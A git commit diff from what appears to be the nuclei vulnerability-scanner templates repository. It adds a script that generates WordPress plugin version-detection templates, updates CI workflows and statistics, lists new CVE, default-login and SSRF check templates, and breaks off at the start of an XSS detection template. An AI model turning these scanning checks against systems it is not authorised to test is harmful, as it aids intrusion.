Merge branch 'main'

patch-1
sandeep 2022-12-29 18:43:30 +05:30
commit 44c80cec17
1265 changed files with 30218 additions and 3381 deletions

View File

@ -0,0 +1,10 @@
beautifulsoup4==4.11.1
bs4==0.0.1
certifi==2022.9.24
charset-normalizer==2.1.1
idna==3.4
Markdown==3.4.1
requests==2.28.1
soupsieve==2.3.2.post1
termcolor==2.1.1
urllib3==1.26.13

View File

@ -0,0 +1,185 @@
#!/usr/bin/env python3
'''
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
compares the detect version with the payload version.
The generated template also includes the tags top-100 and top-200 allowing filtering.
e.g.
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
'''
__author__ = "ricardomaia"
from time import sleep
from bs4 import BeautifulSoup
import requests
import re
from markdown import markdown
import os
from termcolor import colored, cprint
# Regex to extract the name of th plugin from the URL
regex = r"https://wordpress.org/plugins/(\w.+)/"
ranking = 1
# Top 200 Wordpress Plugins
for page_number in range(1, 11):
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0",
"Pragma": "no-cache",
}).content
# Parse HTML
soup = BeautifulSoup(html, 'html.parser')
results = soup.find(id="main")
articles = results.find_all("article", class_="plugin-card")
# Setting the top tag
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
# Get each plugin in the page
for article in articles:
full_title = article.find("h3", class_="entry-title").get_text()
regex_remove_quotes = r"[\"`:]"
subst_remove_quotes = "'"
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
link = article.find("a").get("href")
name = re.search(regex, link).group(1)
cprint(f"Title: {title}", "cyan")
cprint(f"Link: {link}", "yellow")
cprint(f"Name: {name} - Ranking: {ranking}", "green")
print(f"Page Number: {page_number}")
print(f"Top Tag: {top_tag}")
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
ranking += 1
sleep(0.2)
# Get the readme.txt file from SVN
readme = requests.get(
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "plugins.svn.wordpress.org",
"Pragma": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
# Extract the plugin version
try:
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
readme.decode("utf-8")).group(1)
except:
version = "N/A"
# Extract the plugin description
try:
description_markdown = re.search(
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
html = markdown(description_markdown)
full_description = BeautifulSoup(html, 'html.parser').get_text()
regex_max_length = r"(\b.{80}\b)"
subst_max_lenght = "\\g<1>\\n "
description = re.sub(
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
except:
description = "N/A"
print(f"Version: {version}")
print(f"Description: {description}")
# Write the plugin template to file
template = f'''id: wordpress-{name}
info:
name: {title} Detection
author: ricardomaia
severity: info
reference:
- https://wordpress.org/plugins/{name}/
metadata:
plugin_namespace: {name}
wpscan: https://wpscan.com/plugin/{name}
tags: tech,wordpress,wp-plugin,{top_tag}
requests:
- method: GET
path:
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
payloads:
last_version: helpers/wordpress/plugins/{name}.txt
extractors:
- type: regex
part: body
internal: true
name: internal_detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
matchers-condition: or
matchers:
- type: dsl
name: "outdated_version"
dsl:
- compare_versions(internal_detected_version, concat("< ", last_version))
- type: regex
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
'''
work_dir = os.getcwd()
print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/technologies/wordpress/plugins"
if not os.path.exists(helper_dir):
os.makedirs(helper_dir)
if not os.path.exists(template_dir):
os.makedirs(template_dir)
helper_path = f"helpers/wordpress/plugins/{name}.txt"
version_file = open(helper_path, "w")
version_file.write(version)
version_file.close()
template_path = f"technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment
template_file.write(template)
template_file.close()
print("--------------------------------------------")
print("\n")

View File

@ -15,12 +15,12 @@ jobs:
- name: Get Github tag - name: Get Github tag
id: meta id: meta
run: | run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Setup CVE annotate - name: Setup CVE annotate
if: steps.meta.outputs.tag != '' if: steps.meta.outputs.TAG != ''
env: env:
VERSION: ${{ steps.meta.outputs.tag }} VERSION: ${{ steps.meta.outputs.TAG }}
run: | run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin sudo unzip cve-annotate.zip -d /usr/local/bin
@ -30,10 +30,10 @@ jobs:
id: cve-annotate id: cve-annotate
run: | run: |
cve-annotate -i . -d . cve-annotate -i . -d .
echo "::set-output name=changes::$(git status -s | wc -l)" git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files - name: Commit files
if: steps.cve-annotate.outputs.changes > 0 if: steps.cve-annotate.outputs.CHANGES > 0
run: | run: |
git config --local user.email "action@github.com" git config --local user.email "action@github.com"
git config --local user.name "GitHub Action" git config --local user.name "GitHub Action"
@ -42,7 +42,7 @@ jobs:
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes - name: Push changes
if: steps.cve-annotate.outputs.changes > 0 if: steps.cve-annotate.outputs.CHANGES > 0
uses: ad-m/github-push-action@master uses: ad-m/github-push-action@master
with: with:
github_token: ${{ secrets.GITHUB_TOKEN }} github_token: ${{ secrets.GITHUB_TOKEN }}

View File

@ -30,17 +30,17 @@ jobs:
id: readme-update id: readme-update
run: | run: |
python .github/scripts/update-readme.py python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)" git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files - name: Commit files
if: steps.readme-update.outputs.changes > 0 if: steps.readme-update.outputs.CHANGES > 0
run: | run: |
git config --local user.email "action@github.com" git config --local user.email "action@github.com"
git config --local user.name "GitHub Action" git config --local user.name "GitHub Action"
git commit -m "Auto README Update [$(date)] :robot:" -a git commit -m "Auto README Update [$(date)] :robot:" -a
- name: Push changes - name: Push changes
if: steps.readme-update.outputs.changes > 0 if: steps.readme-update.outputs.CHANGES > 0
uses: ad-m/github-push-action@master uses: ad-m/github-push-action@master
with: with:
github_token: ${{ secrets.GITHUB_TOKEN }} github_token: ${{ secrets.GITHUB_TOKEN }}

38
.github/workflows/template-checksum.yml vendored Normal file
View File

@ -0,0 +1,38 @@
name: 📝 Template Checksum
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.18
- name: install checksum generator
run: |
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
- name: Commit files
run: |
git pull
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

View File

@ -14,7 +14,7 @@ jobs:
with: with:
go-version: 1.17 go-version: 1.17
- name: Intalling Indexer - name: Installing Indexer
run: | run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git git clone https://github.com/projectdiscovery/nucleish-api.git
@ -26,4 +26,4 @@ jobs:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: | run: |
generate-index -mode templates generate-index -mode templates

View File

@ -11,12 +11,12 @@ jobs:
- name: Get Github tag - name: Get Github tag
id: meta id: meta
run: | run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Setup Nuclei - name: Setup Nuclei
if: steps.meta.outputs.tag != '' if: steps.meta.outputs.TAG != ''
env: env:
VERSION: ${{ steps.meta.outputs.tag }} VERSION: ${{ steps.meta.outputs.TAG }}
run: | run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin sudo unzip nuclei*.zip -d /usr/local/bin

View File

@ -13,7 +13,7 @@ jobs:
- uses: actions/checkout@master - uses: actions/checkout@master
- uses: actions/setup-go@v2 - uses: actions/setup-go@v2
with: with:
go-version: 1.17 go-version: 1.18
- name: Installing Template Stats - name: Installing Template Stats
run: | run: |
@ -37,10 +37,10 @@ jobs:
- name: Get statistical changes - name: Get statistical changes
id: stats id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)" run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files - name: Commit files
if: steps.stats.outputs.changes > 0 if: steps.stats.outputs.CHANGES > 0
run: | run: |
git add TEMPLATES-STATS.* git add TEMPLATES-STATS.*
git add TOP-10.md git add TOP-10.md

View File

@ -0,0 +1,43 @@
name: ✨ WordPress Plugins - Update
on:
schedule:
- cron: "0 4 * * *" # every day at 4am UTC
workflow_dispatch:
jobs:
Update:
runs-on: ubuntu-latest
steps:
- name: Check out repository code
uses: actions/checkout@v3
with:
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
- name: Install Python3
uses: actions/setup-python@v4
with:
python-version: "3.10"
- run: |
python -m pip install --upgrade pip
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
- name: Update Templates
id: update-templates
run: |
python3 .github/scripts/wordpress-plugins-update.py
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.update-templates.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add --all
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
- name: Push changes
if: steps.update-templates.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -1,4 +1,238 @@
network/cowrie-honeypot-detect.yaml cves/2021/CVE-2021-30128.yaml
network/ftp-default-credentials.yaml cves/2021/CVE-2021-42887.yaml
takeovers/feedpress-takeover.yaml cves/2022/CVE-2022-0786.yaml
takeovers/tictail-takeover.yaml cves/2022/CVE-2022-25082.yaml
cves/2022/CVE-2022-33891.yaml
cves/2022/CVE-2022-3768.yaml
cves/2022/CVE-2022-4260.yaml
cves/2022/CVE-2022-45362.yaml
cves/2022/CVE-2022-46381.yaml
default-logins/kanboard-default-login.yaml
default-logins/mobotix/mobotix-default-login.yaml
default-logins/tiny-file-manager-default-login.yaml
default-logins/xui-weak-login.yaml
exposed-panels/atlantis-detect.yaml
exposed-panels/content-central-login.yaml
exposed-panels/creatio-login-panel.yaml
exposed-panels/kanboard-login.yaml
exposed-panels/loxone-panel.yaml
exposed-panels/ncentral-panel.yaml
exposed-panels/posthog-admin-panel.yaml
exposed-panels/webuzo-admin-panel.yaml
exposed-panels/xfinity-panel.yaml
exposures/logs/ws-ftp-log.yaml
exposures/tokens/zenserp/zenscrape-api-key.yaml
exposures/tokens/zenserp/zenserp-api-key.yaml
iot/carel-plantvisor-panel.yaml
iot/hue-personal-wireless-panel.yaml
iot/raspberry-shake-config.yaml
miscellaneous/gpc-json.yaml
misconfiguration/installer/concrete-installer.yaml
misconfiguration/installer/dolibarr-installer.yaml
misconfiguration/sony-bravia-disclosure.yaml
network/exposed-dockerd.yaml
technologies/akamai-cache-detect.yaml
technologies/aws/amazon-ec2-detect.yaml
technologies/wordpress/plugins/ad-inserter.yaml
technologies/wordpress/plugins/add-to-any.yaml
technologies/wordpress/plugins/admin-menu-editor.yaml
technologies/wordpress/plugins/adminimize.yaml
technologies/wordpress/plugins/advanced-custom-fields.yaml
technologies/wordpress/plugins/akismet.yaml
technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
technologies/wordpress/plugins/all-in-one-seo-pack.yaml
technologies/wordpress/plugins/all-in-one-wp-migration.yaml
technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
technologies/wordpress/plugins/amp.yaml
technologies/wordpress/plugins/antispam-bee.yaml
technologies/wordpress/plugins/astra-sites.yaml
technologies/wordpress/plugins/astra-widgets.yaml
technologies/wordpress/plugins/autoptimize.yaml
technologies/wordpress/plugins/backwpup.yaml
technologies/wordpress/plugins/better-search-replace.yaml
technologies/wordpress/plugins/better-wp-security.yaml
technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
technologies/wordpress/plugins/breadcrumb-navxt.yaml
technologies/wordpress/plugins/broken-link-checker.yaml
technologies/wordpress/plugins/child-theme-configurator.yaml
technologies/wordpress/plugins/classic-editor.yaml
technologies/wordpress/plugins/classic-widgets.yaml
technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
technologies/wordpress/plugins/cloudflare.yaml
technologies/wordpress/plugins/cmb2.yaml
technologies/wordpress/plugins/coblocks.yaml
technologies/wordpress/plugins/code-snippets.yaml
technologies/wordpress/plugins/coming-soon.yaml
technologies/wordpress/plugins/complianz-gdpr.yaml
technologies/wordpress/plugins/contact-form-7-honeypot.yaml
technologies/wordpress/plugins/contact-form-7.yaml
technologies/wordpress/plugins/contact-form-cfdb7.yaml
technologies/wordpress/plugins/cookie-law-info.yaml
technologies/wordpress/plugins/cookie-notice.yaml
technologies/wordpress/plugins/creame-whatsapp-me.yaml
technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
technologies/wordpress/plugins/custom-css-js.yaml
technologies/wordpress/plugins/custom-fonts.yaml
technologies/wordpress/plugins/custom-post-type-ui.yaml
technologies/wordpress/plugins/disable-comments.yaml
technologies/wordpress/plugins/disable-gutenberg.yaml
technologies/wordpress/plugins/duplicate-page.yaml
technologies/wordpress/plugins/duplicate-post.yaml
technologies/wordpress/plugins/duplicator.yaml
technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
technologies/wordpress/plugins/easy-fancybox.yaml
technologies/wordpress/plugins/easy-google-fonts.yaml
technologies/wordpress/plugins/easy-table-of-contents.yaml
technologies/wordpress/plugins/easy-wp-smtp.yaml
technologies/wordpress/plugins/elementor.yaml
technologies/wordpress/plugins/elementskit-lite.yaml
technologies/wordpress/plugins/enable-media-replace.yaml
technologies/wordpress/plugins/envato-elements.yaml
technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
technologies/wordpress/plugins/ewww-image-optimizer.yaml
technologies/wordpress/plugins/facebook-for-woocommerce.yaml
technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
technologies/wordpress/plugins/flamingo.yaml
technologies/wordpress/plugins/fluentform.yaml
technologies/wordpress/plugins/font-awesome.yaml
technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
technologies/wordpress/plugins/formidable.yaml
technologies/wordpress/plugins/forminator.yaml
technologies/wordpress/plugins/ga-google-analytics.yaml
technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
technologies/wordpress/plugins/google-listings-and-ads.yaml
technologies/wordpress/plugins/google-site-kit.yaml
technologies/wordpress/plugins/google-sitemap-generator.yaml
technologies/wordpress/plugins/gtranslate.yaml
technologies/wordpress/plugins/gutenberg.yaml
technologies/wordpress/plugins/happy-elementor-addons.yaml
technologies/wordpress/plugins/header-and-footer-scripts.yaml
technologies/wordpress/plugins/header-footer-code-manager.yaml
technologies/wordpress/plugins/header-footer-elementor.yaml
technologies/wordpress/plugins/header-footer.yaml
technologies/wordpress/plugins/health-check.yaml
technologies/wordpress/plugins/hello-dolly.yaml
technologies/wordpress/plugins/imagify.yaml
technologies/wordpress/plugins/imsanity.yaml
technologies/wordpress/plugins/insert-headers-and-footers.yaml
technologies/wordpress/plugins/instagram-feed.yaml
technologies/wordpress/plugins/intuitive-custom-post-order.yaml
technologies/wordpress/plugins/iwp-client.yaml
technologies/wordpress/plugins/jetpack.yaml
technologies/wordpress/plugins/kadence-blocks.yaml
technologies/wordpress/plugins/kirki.yaml
technologies/wordpress/plugins/leadin.yaml
technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
technologies/wordpress/plugins/limit-login-attempts.yaml
technologies/wordpress/plugins/litespeed-cache.yaml
technologies/wordpress/plugins/loco-translate.yaml
technologies/wordpress/plugins/loginizer.yaml
technologies/wordpress/plugins/loginpress.yaml
technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
technologies/wordpress/plugins/mailchimp-for-wp.yaml
technologies/wordpress/plugins/mailpoet.yaml
technologies/wordpress/plugins/maintenance.yaml
technologies/wordpress/plugins/mainwp-child.yaml
technologies/wordpress/plugins/malcare-security.yaml
technologies/wordpress/plugins/megamenu.yaml
technologies/wordpress/plugins/members.yaml
technologies/wordpress/plugins/meta-box.yaml
technologies/wordpress/plugins/ml-slider.yaml
technologies/wordpress/plugins/newsletter.yaml
technologies/wordpress/plugins/nextend-facebook-connect.yaml
technologies/wordpress/plugins/nextgen-gallery.yaml
technologies/wordpress/plugins/ninja-forms.yaml
technologies/wordpress/plugins/ocean-extra.yaml
technologies/wordpress/plugins/official-facebook-pixel.yaml
technologies/wordpress/plugins/one-click-demo-import.yaml
technologies/wordpress/plugins/optinmonster.yaml
technologies/wordpress/plugins/password-protected.yaml
technologies/wordpress/plugins/pdf-embedder.yaml
technologies/wordpress/plugins/photo-gallery.yaml
technologies/wordpress/plugins/php-compatibility-checker.yaml
technologies/wordpress/plugins/pixelyoursite.yaml
technologies/wordpress/plugins/polylang.yaml
technologies/wordpress/plugins/popup-builder.yaml
technologies/wordpress/plugins/popup-maker.yaml
technologies/wordpress/plugins/post-smtp.yaml
technologies/wordpress/plugins/post-types-order.yaml
technologies/wordpress/plugins/premium-addons-for-elementor.yaml
technologies/wordpress/plugins/pretty-link.yaml
technologies/wordpress/plugins/really-simple-captcha.yaml
technologies/wordpress/plugins/really-simple-ssl.yaml
technologies/wordpress/plugins/redirection.yaml
technologies/wordpress/plugins/redux-framework.yaml
technologies/wordpress/plugins/regenerate-thumbnails.yaml
technologies/wordpress/plugins/safe-svg.yaml
technologies/wordpress/plugins/seo-by-rank-math.yaml
technologies/wordpress/plugins/sg-cachepress.yaml
technologies/wordpress/plugins/sg-security.yaml
technologies/wordpress/plugins/shortcodes-ultimate.yaml
technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
technologies/wordpress/plugins/simple-custom-post-order.yaml
technologies/wordpress/plugins/simple-page-ordering.yaml
technologies/wordpress/plugins/siteguard.yaml
technologies/wordpress/plugins/siteorigin-panels.yaml
technologies/wordpress/plugins/smart-slider-3.yaml
technologies/wordpress/plugins/so-widgets-bundle.yaml
technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml
technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
technologies/wordpress/plugins/sucuri-scanner.yaml
technologies/wordpress/plugins/svg-support.yaml
technologies/wordpress/plugins/table-of-contents-plus.yaml
technologies/wordpress/plugins/tablepress.yaml
technologies/wordpress/plugins/taxonomy-terms-order.yaml
technologies/wordpress/plugins/the-events-calendar.yaml
technologies/wordpress/plugins/themeisle-companion.yaml
technologies/wordpress/plugins/tinymce-advanced.yaml
technologies/wordpress/plugins/translatepress-multilingual.yaml
technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
technologies/wordpress/plugins/under-construction-page.yaml
technologies/wordpress/plugins/unyson.yaml
technologies/wordpress/plugins/updraftplus.yaml
technologies/wordpress/plugins/use-any-font.yaml
technologies/wordpress/plugins/user-role-editor.yaml
technologies/wordpress/plugins/velvet-blues-update-urls.yaml
technologies/wordpress/plugins/w3-total-cache.yaml
technologies/wordpress/plugins/webp-converter-for-media.yaml
technologies/wordpress/plugins/widget-importer-exporter.yaml
technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
technologies/wordpress/plugins/woo-variation-swatches.yaml
technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
technologies/wordpress/plugins/woocommerce-payments.yaml
technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
technologies/wordpress/plugins/woocommerce-services.yaml
technologies/wordpress/plugins/woocommerce.yaml
technologies/wordpress/plugins/woosidebars.yaml
technologies/wordpress/plugins/wordfence.yaml
technologies/wordpress/plugins/wordpress-importer.yaml
technologies/wordpress/plugins/wordpress-seo.yaml
technologies/wordpress/plugins/worker.yaml
technologies/wordpress/plugins/wp-fastest-cache.yaml
technologies/wordpress/plugins/wp-file-manager.yaml
technologies/wordpress/plugins/wp-google-maps.yaml
technologies/wordpress/plugins/wp-mail-smtp.yaml
technologies/wordpress/plugins/wp-maintenance-mode.yaml
technologies/wordpress/plugins/wp-migrate-db.yaml
technologies/wordpress/plugins/wp-multibyte-patch.yaml
technologies/wordpress/plugins/wp-optimize.yaml
technologies/wordpress/plugins/wp-pagenavi.yaml
technologies/wordpress/plugins/wp-reset.yaml
technologies/wordpress/plugins/wp-sitemap-page.yaml
technologies/wordpress/plugins/wp-smushit.yaml
technologies/wordpress/plugins/wp-statistics.yaml
technologies/wordpress/plugins/wp-super-cache.yaml
technologies/wordpress/plugins/wp-user-avatar.yaml
technologies/wordpress/plugins/wpcf7-recaptcha.yaml
technologies/wordpress/plugins/wpcf7-redirect.yaml
technologies/wordpress/plugins/wpforms-lite.yaml
technologies/wordpress/plugins/wps-hide-login.yaml
technologies/wordpress/plugins/yith-woocommerce-compare.yaml
technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
vulnerabilities/amazon/amazon-ec2-ssrf.yaml
vulnerabilities/other/digital-ocean-ssrf.yaml
vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 | | cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 | | panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 | | edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | | | xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | | | lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | | | wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | | cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | | | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | |
**307 directories, 4566 files**. **335 directories, 5229 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 | | cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 | | panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 | | edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 | | exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | | | xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | | | lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | | | wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | | cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | | | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| rce | 342 | princechaddha | 151 | file | 77 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | |

View File

@ -1368,5 +1368,16 @@
"website": "", "website": "",
"email": "" "email": ""
} }
},
{
"author": "heywoodlh",
"links": {
"github": "https://www.github.com/heywoodlh",
"twitter": "",
"linkedin": "",
"website": "https://the-empire.systems",
"email": ""
}
} }
] ]

View File

@ -0,0 +1,47 @@
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2008-6465
cwe-id: CWE-80
metadata:
verified: true
shodan-query: title:"Parallels H-Sphere
tags: cve,cve2008,xss,parallels,h-sphere
requests:
- method: GET
path:
